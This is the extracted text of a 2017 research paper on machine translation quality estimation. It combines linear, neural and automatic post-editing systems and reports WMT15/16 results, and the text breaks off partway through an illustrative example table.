http://dx.doi.org/10.1371/journal.pcbi.1002706 http://dx.doi.org/10.1186/1758-2946-5-23 https://peerj.com/ http://dx.doi.org/10.7717/peerj-cs.61 BioAssay templates for the semantic web Introduction Methods Results Conclusion Supporting Materials References work_rzcndqwjcbdidbg5nsppqfii2q ---- Pushing the Limits of Translation Quality Estimation André F. T. Martins Unbabel Instituto de Telecomunicações Lisbon, Portugal andre.martins@unbabel.com Marcin Junczys-Dowmunt Adam Mickiewicz University in Poznań Poznań, Poland junczys@amu.edu.pl Fabio N. Kepler Unbabel L2F/INESC-ID, Lisbon, Portugal University of Pampa, Alegrete, Brazil kepler@unbabel.com Ramón Astudillo Unbabel L2F/INESC-ID Lisbon, Portugal ramon@unbabel.com Chris Hokamp Dublin City University Dublin, Ireland chokamp@computing.dcu.ie Roman Grundkiewicz Adam Mickiewicz University in Poznań Poznań, Poland romang@amu.edu.pl Abstract Translation quality estimation is a task of growing importance in NLP, due to its poten- tial to reduce post-editing human effort in dis- ruptive ways. However, this potential is cur- rently limited by the relatively low accuracy of existing systems. In this paper, we achieve remarkable improvements by exploiting syn- ergies between the related tasks of word-level quality estimation and automatic post-editing. First, we stack a new, carefully engineered, neural model into a rich feature-based word- level quality estimation system. Then, we use the output of an automatic post-editing sys- tem as an extra feature, obtaining striking re- sults on WMT16: a word-level F MULT1 score of 57.47% (an absolute gain of +7.95% over the current state of the art), and a Pearson correla- tion score of 65.56% for sentence-level HTER prediction (an absolute gain of +13.36%). 1 Introduction The goal of quality estimation (QE) is to evaluate a translation system’s quality without access to ref- erence translations (Blatz et al., 2004; Specia et al., 2013). This has many potential usages: informing an end user about the reliability of translated con- tent; deciding if a translation is ready for publish- ing or if it requires human post-editing; highlighting the words that need to be changed. QE systems are particularly appealing for crowd-sourced and pro- fessional translation services, due to their potential to dramatically reduce post-editing times and to save labor costs (Specia, 2011). The increasing interest in this problem from an industrial angle comes as no surprise (Turchi et al., 2014; de Souza et al., 2015; Martins et al., 2016; Kozlova et al., 2016). In this paper, we tackle word-level QE, whose goal is to assign a label of OK or BAD to each word in the translation (Figure 1). Past approaches to this problem include linear classifiers with handcrafted features (Ueffing and Ney, 2007; Biçici, 2013; Shah et al., 2013; Luong et al., 2014), often combined with feature selection (Avramidis, 2012; Beck et al., 2013), recurrent neural networks (de Souza et al., 2014; Kim and Lee, 2016), and systems that com- bine linear and neural models (Kreutzer et al., 2015; Martins et al., 2016). We start by proposing a “pure” QE system (§3) consisting of a new, carefully en- gineered neural model (NEURALQE), stacked into a linear feature-rich classifier (LINEARQE). Along the way, we provide a rigorous empirical analysis to better understand the contribution of the several groups of features and to justify the architecture of the neural system. A second contribution of this paper is bring- ing in the related task of automatic post-editing (APE; Simard et al. (2007)), which aims to au- 205 Transactions of the Association for Computational Linguistics, vol. 5, pp. 205–218, 2017. Action Editor: Stefan Riezler. Submission batch: 12/2016; Revision batch: 2/2017; Published 7/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Source The Sharpen tool sharpens areas in an image . MT Der Schärfen-Werkezug Bereiche in einem Bild schärfer erscheint . PE (reference) Mit dem Scharfzeichner können Sie einzelne Bereiche in einem Bild scharfzeichnen . QE BAD BAD OK OK OK OK BAD BAD OK ‖ HTER = 66.7% Figure 1: Example from the WMT16 word-level QE training set. Shown are the English source sentence, the German translation (MT), its manual post-edition (PE), and the conversion to word quality labels made with the TERCOM tool (QE). Words labeled as OK are shown in green, and those labeled as BAD are shown in red. We also show the HTER (fraction of edit operations to produce PE from MT) computed by TERCOM. tomatically correct the output of machine transla- tion (MT). We show that a variant of the APE sys- tem of Junczys-Dowmunt and Grundkiewicz (2016), trained on a large amount of artificial “roundtrip translations,” is extremely effective when adapted to predict word-level quality labels (yielding APEQE, §4). We further show that the pure and the APE- based QE system are highly complementary (§5): a stacked combination of LINEARQE, NEURALQE, and APEQE boosts the scores even further, leading to a new state of the art on the WMT15 and WMT16 datasets. For the latter, we achieve an F MULT1 score of 57.47%, which represents an absolute improvement of +7.95% over the previous best system. Finally, we provide a simple word-to-sentence conversion to adapt our system to sentence-level QE. This results in a new state of the art for human- targeted translation error rate (HTER) prediction, where we obtain a Pearson’s r correlation score of 65.56% (+13.36% absolute gain), and for sentence ranking, which achieves a Spearman’s ρ correlation score of 65.92% (+17.62%). We complement our findings with error analysis that highlights the syn- ergies between pure and APE-based QE systems. 2 Datasets and System Architecture Datasets. For developing and evaluating our sys- tems, we use the datasets listed in Table 1. These datasets have been used in the QE and APE tasks in WMT 2015–2016 (Bojar et al., 2015, 2016).1 They span two language pairs (English-Spanish and English-German) and two different domains (news translations and information technology). We used the standard train, development and test splits. Each split contains the source and automatically trans- lated sentences (which we use as inputs), the manu- 1Publicly available at http://www.statmt.org/ wmt15 and http://www.statmt.org/wmt16. ally post-edited sentences (output for the APE task), and a sequence of OK/BAD quality labels, one per each translated word (output for the word-level QE task); see Figure 1. Besides these datasets, for training the APE system we make use of artificial roundtrip translations; this will be detailed in §4. Evaluation. For all experiments, we report the of- ficial evaluation metrics of each dataset’s year. For WMT15, the official metric for the word-level QE task is the F1 score of the BAD labels (F BAD1 ). For WMT16, it is the product of the F1 scores for the OK and BAD labels (denoted F MULT1 ). For sentence- level QE, we report the Pearson’s r correlation for HTER prediction and the Spearman’s ρ correlation score for sentence ranking (Graham, 2015). From post-edited sentences to quality labels. In the datasets above, the word quality labels are ob- tained automatically by aligning the translated and the post-edited sentence with the TERCOM soft- ware tool (Snover et al., 2006)2, with the default settings (tokenized, case insensitive, exact matching only, shifts disabled). This tool computes the HTER (the normalized edit distance) between the translated and post-edited sentence. As a by-product, it aligns the words in the two sentences, identifying substitu- tion errors, word deletions (i.e. words omitted by the translation system), and insertions (redundant words in the translation). Words in the MT output that need to be edited are marked by the BAD quality labels. The fact that the quality labels are automatically obtained from the post-edited sentences is not just an artifact of these datasets, but a procedure that is highly convenient for developing QE systems in an industrial setting. Manually annotating word-level quality labels is time-consuming and expensive; on the other hand, post-editing translated sentences is 2http://www.cs.umd.edu/˜snover/tercom. 206 Dataset Language pair # sents # words WMT15, Train En-Es 11,271 257,548 WMT15, Dev En-Es 1,000 23,207 WMT15, Test En-Es 1,817 40,899 WMT16, Train En-De 12,000 210,958 WMT16, Dev En-De 1,000 19,487 WMT16, Test En-De 2,000 34,531 Table 1: Datasets used in this work. commonly part of the workflow of crowd-sourced and professional translation services. Thus, getting quality labels for free from sentences that have al- ready been post-edited is a much more realistic and sustainable process. This observation suggests that we can tackle word-level QE in two ways: 1. Pure QE: run the TER alignment tool (i.e. TER- COM) on the post-edited data, and then train a QE system directly on the generated quality la- bels; 2. APE-based QE: train an APE system on the original post-edited data, and at runtime use the TER aligment tool to convert the automatically post-edited sentences to quality labels. From a machine learning pespective, QE is a se- quence labeling problem (i.e., whose output se- quence has a fixed length and a small number of labels), while APE is a sequence-to-sequence prob- lem (where the output is of variable length and spans a large vocabulary). Therefore, we can regard APE-based QE as a “projection” of a more complex and fine-grained output (APE) into a simpler output space (QE). APE-based QE systems have the poten- tial for being more powerful since they are trained with this finer-grained information (provided there is enough training data to make them generalize well). We report results in §4 confirming this hypothesis. Our system architecture, described in full detail in the following sections, consists of state of the art pure QE and APE-based QE systems, which are then combined to yield a new, more powerful, QE system. 3 Pure Quality Estimation The best performing system in the WMT16 word- level QE task was developed by the Unbabel team (Martins et al., 2016). It is a pure but rather com- plex QE system, ensembling a linear feature-based classifier with three different neural networks with different configurations. In this section, we provide a simpler version of their system, by replacing the three ensembled neural components by a single one, which we engineer in a principled way. We evaluate the resulting system on additional data (WMT15 in addition to WMT16), covering a new language pair and a new content type. Overall, we obtain a slightly higher accuracy with a much simpler system. In this section, we describe the linear (§3.1) and neural (§3.2) components of our system, as well as their combination (§3.3). 3.1 Linear Sequential Model We start with the linear component of our model, a discriminative feature-based sequential model (called LINEARQE), based on Martins et al. (2016). The system receives as input a tuple 〈s,t,A〉, where s = s1 . . .sM is the source sentence, t = t1 . . . tN is the translated sentence, and A ⊆ {(m,n) | 1 ≤ m ≤ M, 1 ≤ n ≤ N} is a set of word alignments. It predicts as output a sequence ŷ = y1 . . .yN , with each yi ∈{BAD, OK}. This is done as follows: ŷ = arg max y N∑ i=1 w>φu(s,t,A,yi) + N+1∑ i=1 w>φb(s,t,A,yi,yi−1). (1) Above, w is a vector of weights, φu(s,t,A,yi) are unigram features (depending only on a single output label), φb(s,t,A,yi,yi−1) are bigram features (de- pending on consecutive output labels), and y0 and yN+1 are special start/stop symbols. Features. Table 2 shows the unigram and bigram features used in the LINEARQE system. Like the baseline systems provided in WMT15/16, we in- clude features that depend on the target word and its aligned source word, as well as the context sur- rounding them.3 A distinctive aspect of our sys- tem is the inclusion of syntactic features, which will 3Features involving the aligned source word are replaced by NIL if the target word is unaligned. If there are multiple aligned source words, they are concatenated into a single feature. 207 Features Label Input (referenced by the ith target word) unigram yi ∧ . . . ∗BIAS ∗WORD, LEFTWORD, RIGHTWORD ∗SOURCEWORD, SOURCELEFTWORD, SOURCERIGHTWORD ∗LARGESTNGRAMLEFT/RIGHT, SOURCELARGESTNGRAMLEFT/RIGHT ∗POSTAG, SOURCEPOSTAG †WORD+LEFTWORD, WORD+RIGHTWORD †WORD+SOURCEWORD, POSTAG+SOURCEPOSTAG simple bigram yi ∧yi−1 ∧ . . . ∗BIAS rich bigrams yi ∧yi−1 ∧ . . . all above yi+1 ∧yi ∧ . . . WORD+SOURCEWORD, POSTAG+SOURCEPOSTAG syntactic yi ∧ . . . DEPREL, WORD+DEPREL HEADWORD/POSTAG+WORD/POSTAG LEFTSIBWORD/POSTAG+WORD/POSTAG RIGHTSIBWORD/POSTAG+WORD/POSTAG GRANDWORD/POSTAG+HEADWORD/POSTAG+WORD/POSTAG Table 2: Features used in the LINEARQE system (see Martins et al., 2016 for a detailed description). Features marked with ∗ are included in the WMT16 baseline system. Those marked with † were proposed by Kreutzer et al. (2015). show to be useful to detect grammatically incor- rect constructions.4 We use features that involve the dependency relation, the head word, and second- order sibling and grandparent structures. Features involving part-of-speech (POS) tags and syntactic information are obtained with TurboTagger and Tur- boParser (Martins et al., 2013).5 Training. The feature weights are learned by run- ning 50 epochs of the max-loss MIRA algorithm (Crammer et al., 2006), with regularization con- stant C ∈{10−k}4k=1 and a Hamming cost function placing a higher penalty on false positives than on false negatives (cFP ∈ {0.5,0.55, . . . ,0.95},cFN = 1 − cFP ), to account for the existence of fewer BAD labels than OK labels in the data. These values are tuned on the development set. Results and feature contribution. Table 3 shows the performance of the LINEARQE system. To help understand the contribution of each group of features, we evaluated different variants of the LINEARQE system on the development sets of WMT15/16. As expected, the use of bigrams im- proves the simple unigram model, and the syntac- 4While syntactic features have been used previously in sentence-level QE (Rubino et al., 2012), they have never been applied to the finer-grained word-level variant tackled here. 5http://www.cs.cmu.edu/˜ark/TurboParser. Features WMT15 (F BAD1 ) WMT16 (F MULT 1 ) unigrams only 41.77 40.05 +simple bigram 42.20 40.63 +rich bigrams 42.80 43.65 +syntactic (full) 43.68 46.11 Table 3: Performance on the WMT15 (En-Es) and WMT16 (En-De) development sets of several configu- rations of LINEARQE. We report the official metric for these shared tasks, F BAD1 for WMT15 and F MULT 1 for WMT16. tic features help even further. The impact of these features is more prominent in WMT16: the rich bi- gram features lead to scores about 3 points above a sequential model with a single indicator bigram feature, and the syntactic features contribute another 2.5 points. The net improvement exceeds 6 points over the unigram model. 3.2 Neural System Next, we describe the neural component of our pure QE system, which we call NEURALQE. In WMT15 and WMT16, the neural QUETCH system (Kreutzer et al., 2015) and its ensemble with other neural mod- els (Martins et al., 2016) were components of the winning systems. However, none of these neural models managed to outperform a linear model when 208 2 x FF 2 x 400 2 x FF 2 x 200 2 x FF 100 + 50 ... ... BiGRU 100 ... ... BiGRU 200 softmax OK/BAD source word source POS target word target POS em be d d in gs 3 x 64 3 x 50 3 x 64 3 x 50 Figure 2: Architecture of our NEURALQE system. considered in isolation—for example, QUETCH ob- tained a F BAD1 of 35.27% in the WMT15 test set, far below the 40.84% score of the linear system built by the same team. By contrast, our carefully en- gineered NEURALQE model attains a performance superior to that of the linear system, as we shall see. Architecture. The architecture of NEURALQE is depicted in Figure 2. We used Keras (Chollet, 2015) to implement our model. The system receives as input the source and target sentences s and t, their word-level alignments A, and their corresponding POS tags obtained from TurboTagger. The input layer follows a similar architecture as QUETCH, with the addition of POS features. A vector rep- resenting each target word is obtained by concate- nating the embedding of that word with those of the aligned word in the source.6 The immediate left and right contexts for source and target words are also concatenated. We use the pre-trained 64- dimensional Polyglot word embeddings (Al-Rfou et al., 2013) for English, German, and Spanish, and re- fine them during training. In addition to this, POS tags for each source and target word are also em- bedded and concatenated. POS embeddings have size 50 and are initialized as described by Glorot and Bengio (2010). A dropout probability of 0.5 is ap- plied to the resulting vector representations. The following layers are then applied in sequence: 1. Two feed-forward layers of size 400 with recti- fied linear units (ReLU; Nair and Hinton (2010)); 6For the cases in which there are multiple source words aligned to the same target word, the embeddings are averaged. 2. A layer with bidirectional gated recurrent units (BiGRU, Cho et al. (2014)) of size 200, where forward and backward vectors are concatenated, trained with layer normalization (Ba et al., 2016); 3. Two feed-forward ReLU layers of size 200; 4. A BiGRU layer of size 100 with identical config- uration to the previous BiGRU; 5. Two more feed-forward ReLU layers of sizes 100 and 50, respectively. As the output layer, a softmax transformation over the OK/BAD labels is applied. The choice for this architecture was dictated by experiments on the WMT16 development data, as we explain next. Training. We train the model with the RMSProp algorithm (Tieleman and Hinton, 2012) by minimiz- ing the cross-entropy with a linear penalty for BAD word predictions, as in Kreutzer et al. (2015). We set the BAD weight factor to 3.0. All hyperparameters are adjusted based on the development set. Target sentences are bucketed by length and then processed in batches (without any padding or truncation). Results and architectural choices. The final re- sults are shown in Table 4. Overall, the final NEU- RALQE model achieves an F MULT1 score of 46.80% on the WMT16 development set, compared with the 46.11% obtained with the LINEARQE system (cf. Table 3). This contrasts with previous neural systems, such as QUETCH (Kreutzer et al., 2015) and any of the three neural systems developed by Martins et al. (2016), which could not outperform a rich feature linear classifier. To justify the most relevant choices regarding the architecture of NEURALQE, we also evaluated sev- eral variations of it on the WMT16 development set. The use of recurrent layers yields the largest con- tribution to the performance of NEURALQE, as the scores drop sharply (by more than 4 points) if they are replaced by feed-forward layers (which would correspond to a mere deeper QUETCH model). The first BiGRU is particulary effective, as scores drop more than 2 points if it is removed. The use of layer normalization on the recurrent layers also con- tributes positively (+1.20) to the final score. As ex- pected, the use of POS tags adds another large im- provement: everything staying the same, the model 209 Model F MULT1 NEURALQE 46.80 No POS tags 44.41 (-2.39) Replace BiGRU by FF 42.36 (-4.44) Only the first BiGRU 45.76 (-1.04) Only the second BiGRU 44.37 (-2.43) Remove FF between BiGRUs 46.35 (-0.45) Narrower layers 45.09 (-1.71) Broader layers 45.02 (-1.78) One more layer at the end 46.31 (-0.49) No layer normalization 45.60 (-1.20) Table 4: Effect of architectural changes in NEURALQE on the WMT16 development set. without POS tags as input performs almost 2.5 points worse. Finally, varying the size of the hidden layers and the depth of the network hurts the final model’s performance, albeit more slightly. 3.3 Stacking Neural and Linear Models We now stack the NEURALQE system (§3.2) into the LINEARQE system (§3.1) as an ensemble strat- egy; we call the resulting system STACKEDQE. Stacking architectures (Wolpert, 1992; Breiman, 1996) have proved effective in structured NLP prob- lems (Cohen and de Carvalho, 2005; Martins et al., 2008). The underlying idea is to combine two sys- tems by letting the prediction of the first system be used as an input feature for the second system. Dur- ing training, it is necessary to jackknife the first sys- tem’s predictions to avoid overfitting the training set. This is done by splitting the training set in K folds (we set K = 10) and training K different instances of the first system, where each instance is trained on K − 1 folds and makes predictions for the left-out fold. The concatenation of all the predictions yields an unbiased training set for the second classifier. Neural intra-ensembles. We also evaluate the performance of intra-ensembled neural systems. We train independent instances of NEURALQE with dif- ferent random initializations and different data shuf- fles, following the approach of Jean et al. (2015) in neural MT. In Tables 5–6, we report the performance on the WMT15 and WMT16 datasets of systems en- sembling 5 and 15 of these instances, called respec- tively NEURALQE-5 and NEURALQE-15. The in- Model F BAD1 dev F BAD 1 test Best system in WMT15 43.1- 43.12 QUETCH+ (2nd best) – 43.05 LINEARQE 43.68 42.50 NEURALQE 43.51 43.35 NEURALQE-5 44.21 43.54 NEURALQE-15 44.11 43.93 STACKEDQE 44.68 43.70 Table 5: Performance of the pure QE systems on the WMT15 datasets. The best performing system in the WMT15 competition was by Esplà-Gomis et al. (2015), followed by Kreutzer et al. (2015)’s QUETCH+, which is also an ensemble of a linear and a neural system. Model F MULT1 dev F MULT 1 test Best system in WMT16 49.25 49.52 Unbabel-Linear (2nd best) 45.94 46.29 LINEARQE 46.11 46.16 NEURALQE 46.80 47.29 NEURALQE-5 47.30 48.50 NEURALQE-15 46.77 47.98 STACKEDQE 49.16 50.27 Table 6: Performance of the pure QE systems on the WMT16 datasets. The best performing system in the WMT16 competition was by Martins et al. (2016), fol- lowed by a linear system developed by the same team (Unbabel-Linear). stances are ensembled by taking the averaged prob- ability of each word being BAD. We see consistent benefits (both for WMT15 and WMT16) in ensem- bling 5 neural systems and (somewhat surprisingly) some degradation with ensembles of 15. Stacking architecture. The individual instances of the neural systems are incorporated in the stacking architecture as different features, yield- ing STACKEDQE. In total, we have 15 predictions (probability values given by each NEURALQE sys- tem) for every word in the training, development and test datasets. These predictions are plugged as addi- tional features in the LINEARQE model. As uni- gram features, we used one real-valued feature for every model prediction at each position, conjoined with the label. As bigram features, we used two real- valued features for every model prediction at the two positions, conjoined with the label pair. 210 The results obtained with this stacked architecture on the WMT15 and WMT16 datasets are shown re- spectively in Tables 5 and 6. In WMT15, it is un- clear if stacking helps over the best intra-ensembled neural system, with a slight improvement in the development set, but a degradation in the test set. In WMT16, however, stacking is clearly beneficial, with a boost of about 2 points over the best intra- ensembled neural system and 3–4 points above the linear system, both in the development and test par- titions. For the remainder of this paper, we will take STACKEDQE as our pure QE system. 4 APE-Based Quality Estimation Now that we have described a pure QE system, we move on to an APE-based QE system (APEQE). Our starting point is the system submitted by the Adam Mickiewicz University (AMU) team to the APE task of WMT16 (Junczys-Dowmunt and Grundkiewicz, 2016). They explored the applica- tion of neural translation models to the APE problem and achieved good results by treating different mod- els as components in a log-linear model, allowing for multiple inputs (the source s and the translated sentence t) that were decoded to the same target lan- guage (post-edited translation p). Two systems were considered, one using s as the input (s → p) and another using t as the input (t → p). A simple string-matching penalty integrated within the log- linear model was used to control for higher faithful- ness with regard to the raw MT output. The penalty fires if the APE system proposes a word in its output that has not been seen in t. To overcome the problem of too little training data, Junczys-Dowmunt and Grundkiewicz (2016) generated large amounts of artificial data via round- trip translations: a large corpus of monolingual sentences is first gathered for the target language in the domain of interest (each sentence is regarded as an artificial post-edited sentence p); then an MT sys- tem is ran to translate these sentences to the source language (which are regarded as the source sen- tences s), and another MT system in the reverse di- rection translates the latter back to the target lan- guage (playing the role of the translations t). The artificial data is filtered to match the HTER statistics of the training and development data for the shared task.7 Their submission improved over the uncor- rected baseline on the unseen WMT16 test set by - 3.2% TER and +5.5% BLEU and outperformed any other system submitted to the shared-task by a large margin. 4.1 Training the APE System We reproduce the experiments from Junczys- Dowmunt and Grundkiewicz (2016) using Nematus (Sennrich et al., 2016) for training and AmuNMT (Junczys-Dowmunt et al., 2016) for decoding. As stated in §3.3, jackknifing is required to avoid overfitting during the training procedure of the stacked classifiers (§5), therefore we start by prepar- ing four jackknifed models. We perform the follow- ing steps: • We divide the original WMT16 training set into four equally sized parts, maintaining correspon- dences between different languages. Four new training sets are created by leaving out one part and concatenating the remaining three parts. • For each of the four new training sets, we train one APE model on a concatenation of a smaller set of artificial data (denoted as “round-trip.n1” in Junczys-Dowmunt and Grundkiewicz (2016), consisting of 531,839 sentence triples) and a 20- fold oversampled new training set. Each of these newly created four APE models has not seen a dif- ferent part of the quartered original training data. • To avoid overfitting, we use scaling dropout8 over GRU steps and input embeddings, with dropout probabilities 0.2, and over source and target words with probabilities 0.1 (Sennrich et al., 2016). • We use Adam (Kingma and Ba, 2014) instead of Adadelta (Zeiler, 2012). • We train both models (s → p and t → p) un- til convergence up to 20 epochs, saving model checkpoints every 10,000 mini-batches. 7The artificial filtered data has been made available by the authors at https://github.com/emjotde/amunmt/ wiki/AmuNMT-for-Automatic-Post-Editing. 8Currently available in the MRT branch of Nematus at https://github.com/rsennrich/nematus 211 System WMT15 WMT16 Best system 23.23 21.52 Uncorrected baseline 22.91 24.76 APE t → p 23.91 22.60 APE s → p 40.44 28.39 APE TER-tuned 23.29 20.99 Table 7: TER scores on the official WMT15 and WMT16 test sets for the APE task. Lower is better. • The last four model checkpoints of each train- ing run are averaged element-wise (Junczys- Dowmunt et al., 2016) resulting in new single models with generally improved performance. To verify the quality of the APE system, we en- semble the 8 resulting models (4 times s → p and 4 times t → p) and add the APE penalty described in Junczys-Dowmunt and Grundkiewicz (2016). This large ensemble across folds is only used during test time. For creating the jackknifed training data, only the models from the corresponding fold are used. Since we combine models of different types, we tune weights on the development set with MERT9 (Och, 2003) towards TER, yielding the model denoted as “APE TER-tuned”. Results are listed in Table 7 for the APE shared task (WMT 16). For the purely s → p and t → p ensembles, models are weighted equally. We achieve slightly better results in terms of TER, the main task metric, than the original sys- tem, using less data. For completeness, we also apply this proce- dure to WMT15 data, generating a similar resource of 500K artificial English-Spanish-Spanish post- editing triplets via roundtrip translation.10 The train- ing, jackknifing and ensembling methods are the same as for the WMT16 setting. For the WMT15 APE shared task, results are less persuasive than for WMT16: none of the shared task participants was able to beat the uncorrected baseline and our sys- tem fails at this as well. However, we produced the 9We found MERT to work better when tuning towards TER than kb-MIRA which has been used in the original paper. 10Our artificially created data might suffer from a higher mis- match between training and development data. While we were able to match the TER statistics of the dev set, BLEU scores are several points lower. The artificial WMT16 data we created in Junczys-Dowmunt and Grundkiewicz (2016) matches both, TER and BLEU scores, of the respective development set. F BAD1 dev F BAD 1 test APE t → p 13.46 12.83 APE s → p 41.56 41.57 APE TER-tuned 5.96 4.72 APEQE 46.44 46.05 Table 8: Performance of APE-based QE systems on the WMT15 development and test sets. F MULT1 dev F MULT 1 test APE t → p 27.46 31.39 APE s → p 51.92 53.70 APE TER-tuned 40.17 41.87 APEQE 54.95 55.68 Table 9: Performance of APE-based QE systems on the WMT16 development and test sets. second strongest system for case-sensitive TER (Ta- ble 7, WMT15) and the strongest for case-insensitve TER (22.49 vs. 22.54). 4.2 Adaptation to QE and Task-Specific Tuning As described in §2, APE outputs can be turned into word quality labels using TER-based word align- ments. Somewhat surprisingly, among the APE sys- tems introduced above, we observe in Table 9 that the s → p APE system is the so-far strongest stand- alone QE system for the WMT16 task in this work. This system is essentially a retrained neural MT component without any additional features.11 The t → p system and the TER-tuned APE ensemble are much weaker in terms of F MULT1 . This is less surprising in the case of the full ensemble, as it has been tuned towards TER for the APE task specif- ically. However, we can obtain even better APE- based QE systems for both shared task settings by tuning the full APE ensembles towards F MULT1 , the official WMT16 QE metric, and towards F BAD1 for WMT15.12 With this approach, we produce our new best stand-alone QE-systems for both shared tasks, which we denote as APEQE. 11Note that this system resembles other QE approaches which use pseudo-reference features (Albrecht and Hwa, 2008; Soricut and Narsale, 2012; Shah et al., 2013), since the s → p is essentially an “alternative” MT system. 12Using again MERT and executing 7 iterations on the offi- cial development set with an n-best list size of 12. 212 F BAD1 dev F BAD 1 test Best system in WMT15 43.1 43.12 LINEARQE 43.68 42.50 NEURALQE 43.51 43.35 STACKEDQE 44.68 43.70 APEQE 46.44 46.05 FULLSTACKEDQE 47.61 47.08 Table 10: Performance of the several word-level QE sys- tems on the WMT15 development and test datasets. The baseline is the best participating system in WMT15, from Esplà-Gomis et al. (2015). 5 Full Stacked System Finally, we consider a larger stacked system where we stack both NEURALQE and APEQE into LIN- EARQE. This will mix pure QE with APE-based QE systems; we call the result FULLSTACKEDQE. The procedure is analogous to that described in §3.3, with one extra binary feature for the APE-based word quality label predictions. For training, we used jackknifing as described in §3.3. 5.1 Word-Level QE The performance of the FULLSTACKEDQE system on the WMT15 and WMT16 datasets are shown in Tables 10–11. We compare with the other systems introduced in this paper, and with the best partici- pating systems at WMT15–16 (Esplà-Gomis et al., 2015; Martins et al., 2016). We can see that the APE-based and the pure QE systems are complementary: the full combination of the linear, neural, and APE-based systems improves the scores with respect to the best individual sys- tem (APEQE) by about 1 point in WMT15 and 2 points in WMT16. Overall, we obtain for WMT16 an F MULT1 score of 57.47%, a new state of the art, and an absolute gain of +7.95% over Martins et al. (2016). This is a remarkable improvement that can pave the way for a wider adoption of word-level QE systems in industrial settings. For WMT15, we also obtain a new state of the art, with a less impres- sive gain of +3.96% over the best previous system. In §6 we analyze the errors made by the pure and the APE-based QE systems to better understand how they complement each other. F MULT1 dev F MULT 1 test Best system in WMT16 49.25 49.52 LINEARQE 46.11 46.16 NEURALQE 46.80 47.29 STACKEDQE 49.16 50.27 APEQE 54.95 55.68 FULLSTACKEDQE 56.80 57.47 Table 11: Performance of the several word-level QE sys- tems on the WMT16 development and test datasets. The baseline is the best participating system in WMT16, from the Unbabel team (Martins et al., 2016). 5.2 Sentence-Level QE Encouraged by the strong results obtained with the FULLSTACKEDQE system in word-level QE, we in- vestigate how we can adapt this system for HTER prediction at sentence level. Prior work (de Souza et al., 2014) incorporated word-level quality pre- dictions as features in a sentence-level QE system, training a feature-based linear classifier. Here, we show that a very simple conversion, which requires no training or tuning, is enough to obtain a substan- tial improvement over the state of the art. For the APE system, it is easy to obtain a predic- tion for HTER: we can simply measure the HTER between the translated sentence t and the predicted corrected sentence p̂. For a pure QE system, we ap- ply the following word-to-sentence conversion tech- nique: (i) run a QE system to obtain a sequence of OK and BAD word quality labels; (ii) use the frac- tion of BAD labels as an estimate for HTER. Note that this procedure, while not requiring any training, is far from perfect. Words that are not in the trans- lated sentence but exist in the reference post-edited sentence do not originate BAD labels, and therefore will not contribute to the HTER estimate. Yet, as we will see, this procedure applied to the STACKEDQE system (i.e. without the APEQE component) is al- ready sufficient to obtain state of the art results. Fi- nally, to combine the APE and pure QE systems to- ward sentence-level QE, we simply take the average of the two HTER predictions above. Table 12 shows the results obtained with our pure QE system (STACKEDQE), with our APE- based system (APEQE), and with the combination of the two (FULLSTACKEDQE). As baselines, we 213 Pearson dev Pearson test Spearman dev Spearman test WMT15 Best system in WMT15 (ranking) – 39.41 – 36.49 Best system in WMT15 (HTER) – 38.46 – 36.81 STACKEDQE 32.29 36.96 33.22 34.44 APEQE 29.33 40.39 30.80 38.74 FULLSTACKEDQE 36.07 44.99 36.68 42.30 WMT16 Best system in WMT16 (ranking) – 52.5 – – Best system in WMT16 (HTER) – 46.0 – 48.3 STACKEDQE 55.30 54.93 56.46 55.34 APEQE 59.04 61.27 61.06 62.48 FULLSTACKEDQE 64.04 65.56 65.52 65.92 Table 12: Performance of our sentence-level QE systems on the WMT15 an WMT16 datasets, as measured by the WMT16 official evaluation script. The baselines are the best WMT15–16 systems in the HTER prediction track (Bicici et al., 2015; Kozlova et al., 2016) and in the sentence ranking track (Langlois, 2015; Kim and Lee, 2016). report the performance of the two best systems in the sentence-level QE tasks at WMT15 and WMT16 (Bicici et al., 2015; Langlois, 2015; Kozlova et al., 2016; Kim and Lee, 2016). The results are striking: for WMT16, even our weakest system (STACKEDQE) with the simple con- version procedure above is already sufficient to ob- tain state of the art results, outperforming Kozlova et al. (2016) and Kim and Lee (2016) by a considerable margin. The APEQE system gives a very large boost over these scores, which are further increased by the combined FULLSTACKEDQE system. Overall, we obtain absolute gains of +13.36% in Pearson’s r cor- relation score for HTER prediction, and +17.62% in Spearman’s ρ correlation for sentence ranking, a considerable advance over the previous state of the art. For WMT15, we also obtain a new state of the art, with less sharp (but still significant) improve- ments: +5.08% in Pearson’s r correlation score, and +5.81% in Spearman’s ρ correlation. 6 Error Analysis Performance over sentence length. To better un- derstand the differences in performance between the pure QE system (STACKEDQE) and the APE-based system (APEQE), we analyze how the two systems, as well as their combination (FULLSTACKEDQE), perform as a function of the sentence length. Figure 3 shows the averaged number of BAD pre- dictions made by the three systems for different sen- tences lengths, in the WMT16 development set. For comparison, we show also the true average num- ber of BAD words in the gold standard. We ob- serve that, for short sentences (less than 5 words), the pure QE system tends to be too optimistic (i.e., it underpredicts BAD words) and the APE-based sys- tem too pessimistic (overpredicting them). In the range of 5-10 words, the pure QE system matches the proportion of BAD words more accurately than the APE-based system. For medium/long sentences, we observe the opposite behavior (this is partic- ularly clear in the 20-25 word range), with the APE-based system being generally better. On the other hand, the combination of the two systems (FULLSTACKEDQE) manages to find a good bal- ance between these two biases, being much closer to the true proportion of BAD labels for both shorter and longer sentences than any of the individual sys- tems. This shows that the two systems complement each other well in the combination. Illustrative examples. Table 13 shows concrete examples of quality predictions on the WMT16 de- velopment data. In the top example, we can see that the APE system correctly replaced Angleichungs- farbe by Mischfarbe, but is under-corrective in other parts. The APEQE system therefore misses several BAD words, but manages to get the correct label (OK) for den. By contrast, the pure QE system er- roneously flags this word as incorrect, but it makes the right decision on Farbton and zu erstellen, be- ing more accurate than APEQE. The combination of the two systems (pure QE and APEQE) leads to 214 Source Combines the hue value of the blend color with the luminance and saturation of the base color to create the result color . MT Kombiniert den Farbton Wert der Angleichungsfarbe mit der Luminanz und Sättigung der Grundfarbe zu erstellen . PE (Reference) Kombiniert den Farbtonwert der Mischfarbe mit der Luminanz und Sättigung der Grundfarbe . APE Kombiniert den Farbton der Mischfarbe mit der Luminanz und die Sättigung der Grundfarbe , um die Ergebnisfarbe zu erstellen . STACKEDQE Kombiniert den Farbton Wert der Angleichungsfarbe mit der Luminanz und Sättigung der Grund- farbe zu erstellen . APEQE Kombiniert den Farbton Wert der Angleichungsfarbe mit der Luminanz und Sättigung der Grund- farbe zu erstellen . FULLSTACKEDQE Kombiniert den Farbton Wert der Angleichungsfarbe mit der Luminanz und 